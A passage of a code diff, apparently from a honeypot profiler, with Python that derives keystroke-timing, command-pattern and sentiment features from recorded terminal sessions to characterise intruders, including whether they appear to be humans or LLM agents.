iats.append(max(0.0, t - last_non_bs_t))
|
||||
elif c in _KILL_LINE_CHARS:
|
||||
kill_line_count += 1
|
||||
last_non_bs_t = t
|
||||
else:
|
||||
last_non_bs_t = t
|
||||
return backspace_count, tuple(iats), kill_line_count
|
||||
|
||||
|
||||
def _split_typing_bursts(iats: tuple[float, ...]) -> tuple[tuple[float, ...], ...]:
|
||||
"""Split a flat IAT sequence at gaps > IKI_THINK_MAX_S.
|
||||
|
||||
Drops bursts of fewer than 3 IATs — too short to compute a stable
|
||||
CV. Mirrors BEHAVE prototype's ``_split_into_bursts``.
|
||||
"""
|
||||
bursts: list[list[float]] = [[]]
|
||||
for x in iats:
|
||||
if x > IKI_THINK_MAX_S:
|
||||
if bursts[-1]:
|
||||
bursts.append([])
|
||||
else:
|
||||
bursts[-1].append(x)
|
||||
return tuple(tuple(b) for b in bursts if len(b) >= 3)
|
||||
|
||||
|
||||
def _segment_commands(inputs: list[AsciinemaEvent]) -> tuple[Command, ...]:
|
||||
"""Walk input events, splitting on ``\\r`` / ``\\n`` into commands.
|
||||
|
||||
Retains only the first whitespace-delimited token as a sha256 hash
|
||||
plus three integer counters needed for the Phase C
|
||||
``motor.shell_mastery.*`` primitives:
|
||||
|
||||
* ``tab_count`` — ``\\t`` (0x09) keystrokes in the command
|
||||
* ``shortcut_count`` — readline control bytes from
|
||||
:data:`SHORTCUT_CTRL_BYTES`
|
||||
* ``pipe_count`` — ``|`` characters in the command (counted on
|
||||
every byte; pasted pipelines still indicate pipeline fluency the
|
||||
operator chose to execute)
|
||||
|
||||
Buffer contents are dropped on every command boundary; an
|
||||
unterminated trailing buffer (no final newline) yields no command.
|
||||
"""
|
||||
cmds: list[Command] = []
|
||||
buf_chars: list[str] = []
|
||||
buf_start_ts: float | None = None
|
||||
tab_count = 0
|
||||
shortcut_count = 0
|
||||
pipe_count = 0
|
||||
|
||||
for t, _kind, data in inputs:
|
||||
for c in data:
|
||||
if c in ("\r", "\n"):
|
||||
if buf_chars:
|
||||
text = "".join(buf_chars).strip()
|
||||
first_token = text.split(maxsplit=1)[0] if text else ""
|
||||
cmds.append(Command(
|
||||
start_ts=buf_start_ts if buf_start_ts is not None else t,
|
||||
end_ts=t,
|
||||
first_token_hash=hash_token(first_token),
|
||||
tab_count=tab_count,
|
||||
shortcut_count=shortcut_count,
|
||||
pipe_count=pipe_count,
|
||||
))
|
||||
buf_chars = []
|
||||
buf_start_ts = None
|
||||
tab_count = 0
|
||||
shortcut_count = 0
|
||||
pipe_count = 0
|
||||
else:
|
||||
if not buf_chars:
|
||||
buf_start_ts = t
|
||||
buf_chars.append(c)
|
||||
if c == "\t":
|
||||
tab_count += 1
|
||||
elif c == "|":
|
||||
pipe_count += 1
|
||||
elif c in SHORTCUT_CTRL_BYTES:
|
||||
shortcut_count += 1
|
||||
|
||||
return tuple(cmds)
|
||||
|
||||
|
||||
def _annotate_commands_with_output(
|
||||
commands: tuple[Command, ...],
|
||||
outputs: list[AsciinemaEvent],
|
||||
) -> tuple[tuple[Command, ...], tuple[PromptLine, ...]]:
|
||||
"""Re-emit ``commands`` with output-derived fields filled.
|
||||
|
||||
Returns ``(commands, prompt_lines)``. Each ``Command`` gains
|
||||
``errored``, ``output_bytes``, and ``followed_by_prompt`` (Step
|
||||
F.0). The flattened tuple of all detected ``PromptLine`` instances
|
||||
across every command's window is returned alongside for the caller
|
||||
to install on ``SessionContext.prompt_lines``.
|
||||
|
||||
The output window for ``commands[i]`` spans from its ``end_ts``
|
||||
(the ``\\r``/``\\n`` that ran it) to the ``start_ts`` of the next
|
||||
command. The last command's window is open-ended (``math.inf``)
|
||||
so output events arriving at or after ``t_end`` are still captured.
|
||||
"""
|
||||
if not commands:
|
||||
return commands, ()
|
||||
annotated: list[Command] = []
|
||||
all_prompts: list[PromptLine] = []
|
||||
for i, cmd in enumerate(commands):
|
||||
win_end = commands[i + 1].start_ts if i + 1 < len(commands) else math.inf
|
||||
byte_count, errored, prompts = _output_window(outputs, cmd.end_ts, win_end)
|
||||
all_prompts.extend(prompts)
|
||||
annotated.append(Command(
|
||||
start_ts=cmd.start_ts,
|
||||
end_ts=cmd.end_ts,
|
||||
first_token_hash=cmd.first_token_hash,
|
||||
tab_count=cmd.tab_count,
|
||||
shortcut_count=cmd.shortcut_count,
|
||||
pipe_count=cmd.pipe_count,
|
||||
errored=errored,
|
||||
output_bytes=byte_count,
|
||||
followed_by_prompt=bool(prompts),
|
||||
))
|
||||
return tuple(annotated), tuple(all_prompts)
|
||||
|
||||
|
||||
def _per_command_iats(
|
||||
commands: tuple[Command, ...],
|
||||
inputs: list[AsciinemaEvent],
|
||||
) -> tuple[tuple[float, ...], ...]:
|
||||
"""Per-command IATs between consecutive input events whose
|
||||
timestamps fall in ``[cmd.start_ts, cmd.end_ts)``.
|
||||
|
||||
Excludes the terminator IAT (the last event at ``cmd.end_ts`` is
|
||||
the ``\\r``/``\\n`` itself). Returns one tuple per command.
|
||||
"""
|
||||
out: list[tuple[float, ...]] = []
|
||||
for cmd in commands:
|
||||
prev_t: float | None = None
|
||||
cmd_iats: list[float] = []
|
||||
for t, _kind, _data in inputs:
|
||||
if t < cmd.start_ts or t >= cmd.end_ts:
|
||||
continue
|
||||
if prev_t is not None:
|
||||
cmd_iats.append(max(0.0, t - prev_t))
|
||||
prev_t = t
|
||||
out.append(tuple(cmd_iats))
|
||||
return tuple(out)
|
||||
|
||||
|
||||
def _output_bytes_between(
|
||||
outputs: list[AsciinemaEvent],
|
||||
start: float,
|
||||
end: float,
|
||||
) -> int:
|
||||
"""Total ``len(d)`` of output events with ``start <= t < end``."""
|
||||
return sum(len(d) for t, _k, d in outputs if start <= t < end)
|
||||
|
||||
|
||||
def _typed_char_histograms(
|
||||
inputs: list[AsciinemaEvent],
|
||||
) -> tuple[Mapping[str, int], Mapping[str, int], int, _LexCounters]:
|
||||
"""Walk input events, build typed-only unigram + bigram histograms
|
||||
plus the Phase G lexical counters.
|
||||
|
||||
Skip paste-class events (``len(data) >= PASTE_MIN_CHARS_PER_EVENT``)
|
||||
— pasted text reveals nothing about the operator's keyboard or
|
||||
sentiment. Letter bigrams chain only across consecutive ASCII-letter
|
||||
chars; a digit or punctuation character breaks the chain.
|
||||
|
||||
Lexical counters (G.0): a small word buffer (≤ ``LEXEME_MAX_LEN``)
|
||||
accumulates ASCII-letter chars (case-folded). On any non-letter
|
||||
boundary, every suffix of the buffer is checked against
|
||||
``POSITIVE_LEXEMES`` / ``NEGATIVE_LEXEMES`` / ``OBSCENITY_LEXEMES``;
|
||||
the longest match wins (so ``fucking`` counts as one obscenity hit,
|
||||
not two — ``fuck`` + ``fucking``). Caps and bang runs are tracked
|
||||
in the same walk.
|
||||
|
||||
Returns ``(unigrams, bigrams, total_letters, lex_counters)``.
|
||||
"""
|
||||
unigrams: dict[str, int] = {}
|
||||
bigrams: dict[str, int] = {}
|
||||
total_letters = 0
|
||||
last_letter: str | None = None
|
||||
|
||||
word_buf: list[str] = []
|
||||
obscenity_hits = 0
|
||||
positive_lex_hits = 0
|
||||
negative_lex_hits = 0
|
||||
caps_run_cur = 0
|
||||
caps_run_max = 0
|
||||
bang_run_cur = 0
|
||||
bang_run_max = 0
|
||||
|
||||
def _flush_word() -> tuple[int, int, int]:
|
||||
"""Match longest lexeme suffix in ``word_buf``; return per-set deltas."""
|
||||
if not word_buf:
|
||||
return 0, 0, 0
|
||||
s = "".join(word_buf)
|
||||
# Longest-suffix scan against fixed lexicons.
|
||||
for length in range(min(len(s), LEXEME_MAX_LEN), 0, -1):
|
||||
suffix = s[-length:]
|
||||
if suffix in OBSCENITY_LEXEMES:
|
||||
return 1, 0, 0
|
||||
if suffix in POSITIVE_LEXEMES:
|
||||
return 0, 1, 0
|
||||
if suffix in NEGATIVE_LEXEMES:
|
||||
return 0, 0, 1
|
||||
return 0, 0, 0
|
||||
|
||||
for _t, _kind, data in inputs:
|
||||
if len(data) >= PASTE_MIN_CHARS_PER_EVENT:
|
||||
# Paste boundary breaks every running counter.
|
||||
last_letter = None
|
||||
obs_d, pos_d, neg_d = _flush_word()
|
||||
obscenity_hits += obs_d
|
||||
positive_lex_hits += pos_d
|
||||
negative_lex_hits += neg_d
|
||||
word_buf.clear()
|
||||
caps_run_cur = 0
|
||||
bang_run_cur = 0
|
||||
continue
|
||||
for c in data:
|
||||
# Caps-run tracking
|
||||
if c.isascii() and c.isupper():
|
||||
caps_run_cur += 1
|
||||
if caps_run_cur > caps_run_max:
|
||||
caps_run_max = caps_run_cur
|
||||
else:
|
||||
caps_run_cur = 0
|
||||
# Bang-run tracking
|
||||
if c == "!":
|
||||
bang_run_cur += 1
|
||||
if bang_run_cur > bang_run_max:
|
||||
bang_run_max = bang_run_cur
|
||||
else:
|
||||
bang_run_cur = 0
|
||||
# Histogram + lexeme buffering
|
||||
if c.isascii() and c.isalpha():
|
||||
lower = c.lower()
|
||||
unigrams[lower] = unigrams.get(lower, 0) + 1
|
||||
total_letters += 1
|
||||
if last_letter is not None:
|
||||
big = last_letter + lower
|
||||
bigrams[big] = bigrams.get(big, 0) + 1
|
||||
last_letter = lower
|
||||
word_buf.append(lower)
|
||||
if len(word_buf) > LEXEME_MAX_LEN:
|
||||
# Slide window — only the tail can match a lexeme.
|
||||
word_buf[:] = word_buf[-LEXEME_MAX_LEN:]
|
||||
else:
|
||||
last_letter = None
|
||||
obs_d, pos_d, neg_d = _flush_word()
|
||||
obscenity_hits += obs_d
|
||||
positive_lex_hits += pos_d
|
||||
negative_lex_hits += neg_d
|
||||
word_buf.clear()
|
||||
|
||||
# Trailing word (no boundary at end of input).
|
||||
obs_d, pos_d, neg_d = _flush_word()
|
||||
obscenity_hits += obs_d
|
||||
positive_lex_hits += pos_d
|
||||
negative_lex_hits += neg_d
|
||||
|
||||
if len(bigrams) > LAYOUT_BIGRAM_TOP_N:
|
||||
top = sorted(bigrams.items(), key=lambda kv: -kv[1])[:LAYOUT_BIGRAM_TOP_N]
|
||||
bigrams = dict(top)
|
||||
return unigrams, bigrams, total_letters, _LexCounters(
|
||||
obscenity_hits=obscenity_hits,
|
||||
positive_lex_hits=positive_lex_hits,
|
||||
negative_lex_hits=negative_lex_hits,
|
||||
caps_run_max=caps_run_max,
|
||||
bang_run_max=bang_run_max,
|
||||
)
|
||||
|
||||
|
||||
def _output_window(
|
||||
outputs: list[AsciinemaEvent],
|
||||
start: float,
|
||||
end: float,
|
||||
) -> tuple[int, bool, tuple[PromptLine, ...]]:
|
||||
"""Walk output events in ``[start, end)`` once.
|
||||
|
||||
Returns ``(byte_count, errored, prompt_lines)``. ``byte_count`` is
|
||||
the raw byte count (pre-strip); ``errored`` is the canonical-error
|
||||
-pattern match over the ANSI-stripped concatenation;
|
||||
``prompt_lines`` is the tuple of PS1 lines detected in the same
|
||||
stripped text (Step F.0).
|
||||
|
||||
PII trade-off (Phase F): the stripped text itself is dropped on
|
||||
return, but ``prompt_lines`` retains PS1 strings (capped at
|
||||
``PROMPT_LINE_MAX_CHARS``). Only derived values leave the engine
|
||||
via observations; the prompt strings live on ``SessionContext``
|
||||
so F.1 / F.3 / E.4 can read them.
|
||||
"""
|
||||
chunks: list[str] = []
|
||||
last_ts = start
|
||||
byte_count = 0
|
||||
for t, _k, d in outputs:
|
||||
if start <= t < end:
|
||||
byte_count += len(d)
|
||||
chunks.append(d)
|
||||
last_ts = t
|
||||
if not chunks:
|
||||
return 0, False, ()
|
||||
stripped = strip_ansi("".join(chunks))
|
||||
errored = detect_error_in_output(stripped)
|
||||
prompts = tuple(extract_prompt_lines(
|
||||
stripped, base_ts=last_ts, max_chars=PROMPT_LINE_MAX_CHARS,
|
||||
))
|
||||
return byte_count, errored, prompts
|
||||
|
||||
|
||||
def build_session_context(
|
||||
events: Iterable[AsciinemaEvent],
|
||||
*,
|
||||
sid: str,
|
||||
source: str,
|
||||
evidence_ref: str | None = None,
|
||||
) -> SessionContext:
|
||||
"""Single-pass build of the SessionContext for ``events``."""
|
||||
inputs: list[AsciinemaEvent] = []
|
||||
outputs: list[AsciinemaEvent] = []
|
||||
t_first: float | None = None
|
||||
t_last: float = 0.0
|
||||
|
||||
for ev in events:
|
||||
t, kind, _ = ev
|
||||
if t_first is None:
|
||||
t_first = t
|
||||
if t > t_last:
|
||||
t_last = t
|
||||
if kind == "i":
|
||||
inputs.append(ev)
|
||||
elif kind == "o":
|
||||
outputs.append(ev)
|
||||
|
||||
if t_first is None:
|
||||
t_start = 0.0
|
||||
t_end = 0.0
|
||||
else:
|
||||
t_start = t_first
|
||||
t_end = t_last
|
||||
|
||||
iats: tuple[float, ...] = tuple(
|
||||
max(0.0, inputs[i][0] - inputs[i - 1][0]) for i in range(1, len(inputs))
|
||||
)
|
||||
paste_bursts, paste_count = _detect_paste_bursts(inputs)
|
||||
typing_bursts = _split_typing_bursts(iats)
|
||||
backspace_count, backspace_iats, kill_line_count = _scan_correction_signals(inputs)
|
||||
commands = _segment_commands(inputs)
|
||||
commands, prompt_lines = _annotate_commands_with_output(commands, outputs)
|
||||
inter_cmd_iats = tuple(
|
||||
max(0.0, commands[i + 1].start_ts - commands[i].end_ts)
|
||||
for i in range(len(commands) - 1)
|
||||
)
|
||||
output_per_cmd = tuple(
|
||||
_output_bytes_between(outputs, commands[i].end_ts, commands[i + 1].start_ts)
|
||||
for i in range(len(commands) - 1)
|
||||
)
|
||||
intra_command_iats = _per_command_iats(commands, inputs)
|
||||
typed_uni, typed_bi, typed_letters, lex = _typed_char_histograms(inputs)
|
||||
|
||||
return SessionContext(
|
||||
sid=sid,
|
||||
source=source,
|
||||
evidence_ref=evidence_ref or f"session:{sid}",
|
||||
t_start=t_start,
|
||||
t_end=t_end,
|
||||
duration_s=max(0.0, t_end - t_start),
|
||||
input_events=tuple(inputs),
|
||||
output_events=tuple(outputs),
|
||||
iats=iats,
|
||||
paste_bursts=paste_bursts,
|
||||
paste_event_count=paste_count,
|
||||
commands=commands,
|
||||
inter_cmd_iats=inter_cmd_iats,
|
||||
output_per_cmd=output_per_cmd,
|
||||
typing_bursts=typing_bursts,
|
||||
backspace_count=backspace_count,
|
||||
backspace_iats=backspace_iats,
|
||||
kill_line_count=kill_line_count,
|
||||
intra_command_iats=intra_command_iats,
|
||||
prompt_lines=prompt_lines,
|
||||
typed_unigram_counts=typed_uni,
|
||||
typed_bigram_counts=typed_bi,
|
||||
typed_letter_count=typed_letters,
|
||||
obscenity_hits=lex.obscenity_hits,
|
||||
positive_lex_hits=lex.positive_lex_hits,
|
||||
negative_lex_hits=lex.negative_lex_hits,
|
||||
caps_run_max=lex.caps_run_max,
|
||||
bang_run_max=lex.bang_run_max,
|
||||
)
|
||||
@@ -1,104 +0,0 @@
|
||||
"""Registered feature functions.
|
||||
|
||||
Each entry takes a ``SessionContext`` and yields zero or more
|
||||
``Observation`` instances. Adding a primitive = adding a function in a
|
||||
sibling module and appending it to ``FEATURES``.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
from typing import Callable, Iterable
|
||||
|
||||
from behave_core.spec.envelope import Observation
|
||||
|
||||
from decnet.profiler.behave_shell._ctx import SessionContext
|
||||
from decnet.profiler.behave_shell._features.cognitive import (
|
||||
cognitive_load,
|
||||
command_branch_diversity,
|
||||
error_resilience_fallback_to_man,
|
||||
error_resilience_frustration_typing,
|
||||
error_resilience_retry_tactic,
|
||||
exploration_style,
|
||||
feedback_loop_engagement,
|
||||
planning_depth,
|
||||
tool_vocabulary,
|
||||
inter_command_consistency,
|
||||
inter_command_latency_class,
|
||||
)
|
||||
from decnet.profiler.behave_shell._features.emotional_valence import (
|
||||
arousal,
|
||||
frustration_venting,
|
||||
stress_response,
|
||||
valence,
|
||||
)
|
||||
from decnet.profiler.behave_shell._features.environmental import (
|
||||
keyboard_layout,
|
||||
locale,
|
||||
numpad_usage,
|
||||
shell_type,
|
||||
terminal_multiplexer,
|
||||
)
|
||||
from decnet.profiler.behave_shell._features.operational import (
|
||||
cleanup_behavior,
|
||||
multi_actor_indicators,
|
||||
objective,
|
||||
opsec_discipline,
|
||||
)
|
||||
from decnet.profiler.behave_shell._features.temporal import (
|
||||
escalation_pattern,
|
||||
exit_behavior,
|
||||
landing_ritual,
|
||||
session_duration,
|
||||
)
|
||||
from decnet.profiler.behave_shell._features.motor import (
|
||||
command_chunking,
|
||||
error_correction,
|
||||
input_modality,
|
||||
keystroke_cadence,
|
||||
motor_stability,
|
||||
paste_burst_rate,
|
||||
pipe_chaining_depth,
|
||||
shortcut_usage,
|
||||
tab_completion,
|
||||
)
|
||||
|
||||
FeatureFn = Callable[[SessionContext], Iterable[Observation]]
|
||||
|
||||
FEATURES: tuple[FeatureFn, ...] = (
|
||||
input_modality,
|
||||
paste_burst_rate,
|
||||
keystroke_cadence,
|
||||
motor_stability,
|
||||
error_correction,
|
||||
command_chunking,
|
||||
tab_completion,
|
||||
shortcut_usage,
|
||||
pipe_chaining_depth,
|
||||
inter_command_latency_class,
|
||||
command_branch_diversity,
|
||||
feedback_loop_engagement,
|
||||
inter_command_consistency,
|
||||
cognitive_load,
|
||||
exploration_style,
|
||||
planning_depth,
|
||||
tool_vocabulary,
|
||||
error_resilience_retry_tactic,
|
||||
error_resilience_frustration_typing,
|
||||
error_resilience_fallback_to_man,
|
||||
session_duration,
|
||||
escalation_pattern,
|
||||
landing_ritual,
|
||||
exit_behavior,
|
||||
shell_type,
|
||||
terminal_multiplexer,
|
||||
locale,
|
||||
keyboard_layout,
|
||||
numpad_usage,
|
||||
objective,
|
||||
opsec_discipline,
|
||||
cleanup_behavior,
|
||||
multi_actor_indicators,
|
||||
valence,
|
||||
arousal,
|
||||
stress_response,
|
||||
frustration_venting,
|
||||
)
|
||||
@@ -1,32 +0,0 @@
|
||||
"""Helper for building registry-valid :class:`Observation` records.
|
||||
|
||||
Every feature module would otherwise repeat the same Window /
|
||||
source / evidence_ref boilerplate. This helper centralises it and is
|
||||
the one place to reach when emission semantics change (e.g. when we
|
||||
start parametrising windows on a per-primitive basis).
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
from typing import Any
|
||||
|
||||
from behave_core.spec.envelope import Observation, Window
|
||||
|
||||
from decnet.profiler.behave_shell._ctx import SessionContext
|
||||
|
||||
|
||||
def make_observation(
|
||||
ctx: SessionContext,
|
||||
*,
|
||||
primitive: str,
|
||||
value: Any,
|
||||
confidence: float,
|
||||
) -> Observation:
|
||||
"""Build one :class:`Observation` for the whole-session window."""
|
||||
return Observation(
|
||||
primitive=primitive,
|
||||
value=value,
|
||||
confidence=confidence,
|
||||
window=Window(start_ts=ctx.t_start, end_ts=ctx.t_end),
|
||||
source=ctx.source,
|
||||
evidence_ref=ctx.evidence_ref,
|
||||
)
|
||||
@@ -1,593 +0,0 @@
|
||||
"""``cognitive.*`` feature functions.
|
||||
|
||||
Step 5: ``cognitive.inter_command_latency_class``.
|
||||
Step 6: ``cognitive.command_branch_diversity``.
|
||||
Step 7: ``cognitive.feedback_loop_engagement``.
|
||||
Step 8: ``cognitive.inter_command_consistency``.
|
||||
Step D.1: ``cognitive.cognitive_load``.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import statistics
|
||||
from typing import Iterator
|
||||
|
||||
from behave_core.spec.envelope import Observation
|
||||
|
||||
from decnet.profiler.behave_shell._ctx import SessionContext
|
||||
from decnet.profiler.behave_shell._features._emit import make_observation
|
||||
from decnet.profiler.behave_shell._parse import hash_token
|
||||
from decnet.profiler.behave_shell._thresholds import (
|
||||
BRANCH_DIVERSITY_LINEAR_MIN,
|
||||
COGNITIVE_LOAD_CHUNKING_REF_CV,
|
||||
COGNITIVE_LOAD_LOW_MAX,
|
||||
COGNITIVE_LOAD_MEDIUM_MAX,
|
||||
COGNITIVE_LOAD_PACE_REF_CV,
|
||||
EXPLORATION_CHAOTIC_BACKTRACK_MIN,
|
||||
EXPLORATION_TARGETED_REP_MIN,
|
||||
FEEDBACK_CORRELATION_MIN,
|
||||
FEEDBACK_MIN_PAIRS,
|
||||
FRUSTRATION_LOW_MAX,
|
||||
FRUSTRATION_MODERATE_MAX,
|
||||
IKI_THINK_MAX_S,
|
||||
INTER_CMD_DELIBERATE_MAX,
|
||||
INTER_CMD_INSTANT_MAX,
|
||||
INTER_CMD_LLM_HEAVYWEIGHT_MAX,
|
||||
INTER_CMD_LLM_LIGHTWEIGHT_MAX,
|
||||
INTER_CMD_TYPING_MAX,
|
||||
MIN_COMMANDS_FOR_FULL_CONFIDENCE,
|
||||
PAUSE_CV_BIMODAL_MIN,
|
||||
PAUSE_CV_METRONOMIC_MAX,
|
||||
PLANNING_DEEP_MIN,
|
||||
PLANNING_REACTIVE_MIN,
|
||||
TOOL_VOCAB_BROAD_MIN,
|
||||
TOOL_VOCAB_NARROW_MAX,
|
||||
)
|
||||
|
||||
|
||||
# Precomputed at import time so the per-session hot loop is a set
|
||||
# membership check, not 3 sha256 ops per command. The ``--help`` /
|
||||
# ``-h`` flag forms can't be detected here — they're not first tokens
|
||||
# (PII discipline keeps only the *first* token's hash). v0.2 will
|
||||
# reconsider once corpus calibration justifies storing arg-token
|
||||
# hashes too.
|
||||
_HELP_FAMILY_HASHES: frozenset[str] = frozenset({
|
||||
hash_token("man"),
|
||||
hash_token("help"),
|
||||
hash_token("info"),
|
||||
})
|
||||
|
||||
|
||||
def _clip01(x: float) -> float:
|
||||
if x < 0.0:
|
||||
return 0.0
|
||||
if x > 1.0:
|
||||
return 1.0
|
||||
return x
|
||||
|
||||
|
||||
def _cv(xs: tuple[float, ...] | list[float]) -> float | None:
|
||||
"""Coefficient of variation; ``None`` if undefined (n<2 or mean==0)."""
|
||||
if len(xs) < 2:
|
||||
return None
|
||||
mean = statistics.fmean(xs)
|
||||
if mean <= 0.0:
|
||||
return None
|
||||
return statistics.stdev(xs) / mean
|
||||
|
||||
|
||||
def _bucket_inter_cmd_latency(median_iat: float) -> str:
|
||||
if median_iat <= INTER_CMD_INSTANT_MAX:
|
||||
return "instant"
|
||||
if median_iat <= INTER_CMD_TYPING_MAX:
|
||||
return "typing_speed"
|
||||
if median_iat <= INTER_CMD_DELIBERATE_MAX:
|
||||
return "deliberate"
|
||||
if median_iat <= INTER_CMD_LLM_LIGHTWEIGHT_MAX:
|
||||
return "llm_lightweight"
|
||||
if median_iat <= INTER_CMD_LLM_HEAVYWEIGHT_MAX:
|
||||
return "llm_heavyweight"
|
||||
return "long"
|
||||
|
||||
|
||||
def inter_command_latency_class(ctx: SessionContext) -> Iterator[Observation]:
|
||||
"""Emit ``cognitive.inter_command_latency_class``.
|
||||
|
||||
Operator's *thinking pace* between commands, bucketed against
|
||||
calibrated thresholds. Splits LW-sim / CLAUDE-FF / CLAUDE-CL.
|
||||
"""
|
||||
if not ctx.inter_cmd_iats:
|
||||
return
|
||||
median_iat = statistics.median(ctx.inter_cmd_iats)
|
||||
bucket = _bucket_inter_cmd_latency(median_iat)
|
||||
# Sample-size honesty: < 5 commands → halve confidence
|
||||
if len(ctx.commands) < MIN_COMMANDS_FOR_FULL_CONFIDENCE:
|
||||
confidence = 0.40
|
||||
else:
|
||||
confidence = 0.80
|
||||
yield make_observation(
|
||||
ctx,
|
||||
primitive="cognitive.inter_command_latency_class",
|
||||
value=bucket,
|
||||
confidence=confidence,
|
||||
)
|
||||
|
||||
|
||||
def command_branch_diversity(ctx: SessionContext) -> Iterator[Observation]:
|
||||
"""Emit ``cognitive.command_branch_diversity``.
|
||||
|
||||
Content-based discriminator (no timing): unique first-token ratio
|
||||
over total commands. Splits CLAUDE-FF (linear_playbook) from
|
||||
CLAUDE-CL (adaptive_branching). The empirical anchor on
|
||||
2026-05-02: fire-and-forget runs ~10 distinct tools; closed-loop
|
||||
runs 5-6 with ``curl`` re-invoked as the operator chases threads.
|
||||
"""
|
||||
n = len(ctx.commands)
|
||||
if n == 0:
|
||||
# No commands at all → nothing honest to say. Skip emission.
|
||||
return
|
||||
if n < MIN_COMMANDS_FOR_FULL_CONFIDENCE:
|
||||
# Registry admits "unknown"; absence of *enough* data is itself
|
||||
# a high-confidence answer.
|
||||
yield make_observation(
|
||||
ctx,
|
||||
primitive="cognitive.command_branch_diversity",
|
||||
value="unknown",
|
||||
confidence=1.0,
|
||||
)
|
||||
return
|
||||
unique = len({c.first_token_hash for c in ctx.commands})
|
||||
ratio = unique / n
|
||||
if ratio >= BRANCH_DIVERSITY_LINEAR_MIN:
|
||||
value = "linear_playbook"
|
||||
else:
|
||||
# Anything below the linear floor is treated as adaptive — the
|
||||
# operator is reusing tools, the discriminative signal we
|
||||
# actually want.
|
||||
value = "adaptive_branching"
|
||||
yield make_observation(
|
||||
ctx,
|
||||
primitive="cognitive.command_branch_diversity",
|
||||
value=value,
|
||||
confidence=0.80,
|
||||
)
|
||||
|
||||
|
||||
def feedback_loop_engagement(ctx: SessionContext) -> Iterator[Observation]:
|
||||
"""Emit ``cognitive.feedback_loop_engagement``.
|
||||
|
||||
Pearson correlation between ``output_per_cmd[i]`` (bytes the
|
||||
operator saw before the next command) and
|
||||
``inter_cmd_iats[i]`` (the pause that followed). closed_loop
|
||||
operators read more before pausing more; fire_and_forget operators
|
||||
pace independently of output. CUTS ACROSS the LLM/human axis —
|
||||
closed-loop LLMs and reading humans both score closed_loop.
|
||||
|
||||
First primitive that depends on output events: zero output events
|
||||
in the shard → emit ``unknown`` at confidence 1.0 (no honest
|
||||
correlation possible) and exit.
|
||||
"""
|
||||
pairs = list(zip(ctx.output_per_cmd, ctx.inter_cmd_iats))
|
||||
if not ctx.output_events or len(pairs) < FEEDBACK_MIN_PAIRS:
|
||||
if not ctx.commands:
|
||||
return
|
||||
yield make_observation(
|
||||
ctx,
|
||||
primitive="cognitive.feedback_loop_engagement",
|
||||
value="unknown",
|
||||
confidence=1.0,
|
||||
)
|
||||
return
|
||||
xs = [float(p[0]) for p in pairs]
|
||||
ys = [float(p[1]) for p in pairs]
|
||||
try:
|
||||
r = statistics.correlation(xs, ys)
|
||||
except statistics.StatisticsError:
|
||||
# Constant series on either axis — correlation undefined.
|
||||
yield make_observation(
|
||||
ctx,
|
||||
primitive="cognitive.feedback_loop_engagement",
|
||||
value="unknown",
|
||||
confidence=1.0,
|
||||
)
|
||||
return
|
||||
if r > FEEDBACK_CORRELATION_MIN:
|
||||
value = "closed_loop"
|
||||
else:
|
||||
value = "fire_and_forget"
|
||||
yield make_observation(
|
||||
ctx,
|
||||
primitive="cognitive.feedback_loop_engagement",
|
||||
value=value,
|
||||
confidence=0.75,
|
||||
)
|
||||
|
||||
|
||||
def error_resilience_fallback_to_man(ctx: SessionContext) -> Iterator[Observation]:
|
||||
"""Emit ``cognitive.error_resilience.fallback_to_man``.
|
||||
|
||||
For each errored command, check whether the operator's next
|
||||
command is ``man`` / ``help`` / ``info`` — i.e. they reached for
|
||||
the manual rather than re-trying or pivoting. If at least one
|
||||
errored command triggered this fallback → ``present``; otherwise
|
||||
``absent``.
|
||||
|
||||
Skip emission when no commands errored — the registry's binary
|
||||
has no ``unknown``, and emitting ``absent`` from no observation
|
||||
at all would be dishonest.
|
||||
|
||||
The ``--help`` / ``-h`` flag forms can't fire this primitive in
|
||||
v0.1: they aren't first tokens, and the engine only retains
|
||||
``first_token_hash`` per command (PII discipline). Filed for v0.2.
|
||||
"""
|
||||
errored_indices = [i for i, c in enumerate(ctx.commands) if c.errored]
|
||||
if not errored_indices:
|
||||
return
|
||||
fallback_count = 0
|
||||
for i in errored_indices:
|
||||
if i + 1 >= len(ctx.commands):
|
||||
continue
|
||||
if ctx.commands[i + 1].first_token_hash in _HELP_FAMILY_HASHES:
|
||||
fallback_count += 1
|
||||
value = "present" if fallback_count > 0 else "absent"
|
||||
|
||||
if len(errored_indices) < MIN_COMMANDS_FOR_FULL_CONFIDENCE:
|
||||
confidence = 0.40
|
||||
else:
|
||||
confidence = 0.65
|
||||
yield make_observation(
|
||||
ctx,
|
||||
primitive="cognitive.error_resilience.fallback_to_man",
|
||||
value=value,
|
||||
confidence=confidence,
|
||||
)
|
||||
|
||||
|
||||
def error_resilience_frustration_typing(ctx: SessionContext) -> Iterator[Observation]:
|
||||
"""Emit ``cognitive.error_resilience.frustration_typing``.
|
||||
|
||||
Compares median within-command IAT for commands *following* an
|
||||
errored command against the same statistic for commands following
|
||||
a successful command. A large relative delta indicates the operator
|
||||
typed differently after a failure — speed-up (rage / fluency) or
|
||||
slowdown (caution); both are signs of arousal.
|
||||
|
||||
Skip emission when either group is empty (no errors, or every
|
||||
command errored — no clean baseline). Sample-size honesty drops
|
||||
confidence below the floor.
|
||||
"""
|
||||
post_err: list[float] = []
|
||||
post_ok: list[float] = []
|
||||
cmds = ctx.commands
|
||||
intra = ctx.intra_command_iats
|
||||
if len(cmds) < 2 or len(intra) != len(cmds):
|
||||
return
|
||||
for i in range(1, len(cmds)):
|
||||
cmd_iats = intra[i]
|
||||
if not cmd_iats:
|
||||
continue
|
||||
m = statistics.median(cmd_iats)
|
||||
if cmds[i - 1].errored:
|
||||
post_err.append(m)
|
||||
else:
|
||||
post_ok.append(m)
|
||||
if not post_err or not post_ok:
|
||||
return
|
||||
median_err = statistics.median(post_err)
|
||||
median_ok = statistics.median(post_ok)
|
||||
if median_ok <= 0.0:
|
||||
return
|
||||
delta = abs(median_err - median_ok) / median_ok
|
||||
|
||||
if delta < FRUSTRATION_LOW_MAX:
|
||||
value = "low"
|
||||
elif delta < FRUSTRATION_MODERATE_MAX:
|
||||
value = "moderate"
|
||||
else:
|
||||
value = "high"
|
||||
|
||||
if len(post_err) < MIN_COMMANDS_FOR_FULL_CONFIDENCE:
|
||||
confidence = 0.40
|
||||
else:
|
||||
confidence = 0.60
|
||||
yield make_observation(
|
||||
ctx,
|
||||
